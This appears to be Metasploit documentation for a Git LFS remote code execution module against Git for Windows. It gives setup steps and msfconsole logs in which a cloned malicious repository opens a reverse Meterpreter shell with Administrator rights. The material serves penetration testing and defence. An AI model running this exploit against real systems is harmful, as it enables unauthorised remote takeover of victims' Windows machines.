CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/documentation/modules/exploit/windows/http/git_lfs_rce.md
Views: 1904

Vulnerable Application

Git in versions <= 2.29.2 includes git-lfs extension which allows remote attackers to execute arbitrary code on the victim's Windows system upon a clone operation. Attackers are able to plant a backdoor in the root directory of a malicious repository by simply adding an executable file named git.exe or any other executable extension available on the target Windows system (PATHEXT environment variable dependent). As a result, the malicious git binary will get executed automatically instead of the original git binary located in a trusted path, when the repository is cloned.

Vulnerable Installation

  1. Download a vulnerable version of Git for Windows: v2.28.0

  2. On the Select Components section of the installer, make sure Git LFS is selected (should be by default)

  3. You should now be able to run the exploit and get a session on Windows

Verification Steps

  1. Install the application

  2. Start msfconsole

  3. Do: use exploit/multi/http/git_lfs_rce

  4. Do: run

  5. Ensure the exploit sets up a repository to be cloned, ex: http://192.168.123.1:8080/fixflex.git

  6. From the victim machine, clone the repository created by the exploit.

  7. You should get a shell.

Scenarios

Git v2.28.0 on Windows 10 (2004)

msf6 > use windows/http/git_lfs_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/git_lfs_rce) > set LHOST 172.16.199.1
LHOST => 172.16.199.1
msf6 exploit(windows/http/git_lfs_rce) > set RHOSTS 172.16.199.151
RHOSTS => 172.16.199.151
msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 172.16.199.1:4444 
msf6 exploit(windows/http/git_lfs_rce) > 
[*] Using URL: http://0.0.0.0:8080/4C11tyW2NVX
[*] Local IP: http://192.168.2.114:8080/4C11tyW2NVX
[*] Server started.
[*] Git repository to clone: http://172.16.199.1:8080/cookley.git
[*] Sending payload data...
[*] Sending LFS object...
[*] Sending stage (200262 bytes) to 172.16.199.151
[+] Deleted .gitattributes
[*] Meterpreter session 1 opened (172.16.199.1:4444 -> 172.16.199.151:50018) at 2021-09-07 12:05:55 -0400
msf6 exploit(windows/http/git_lfs_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-13BFU78\Administrator
meterpreter > sysinfo
Computer        : DESKTOP-13BFU78
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/windows
meterpreter >

Git v2.32.0 on Windows 10 20H2

msf6 > use windows/http/git_lfs_rce
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/http/git_lfs_rce) > set LHOST 192.168.123.1
LHOST => 192.168.123.1
msf6 exploit(windows/http/git_lfs_rce) > set RHOSTS 192.168.123.150
RHOSTS => 172.16.199.151
msf6 exploit(windows/http/git_lfs_rce) > run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target is vulnerable.
msf6 exploit(windows/http/git_lfs_rce) > [*] Using URL: http://0.0.0.0:8080/15VCXHvHTOq5O
[*] Local IP: http://192.168.2.114:8080/15VCXHvHTOq5O
[*] Server started.
[*] Git repository to clone: http://192.168.123.1:8080/fixflex.git
[-] Exception handling request: The git client needs to be running on windows with a version less than 2.29.2. The client found was running on: Windows and was version: 2.32.0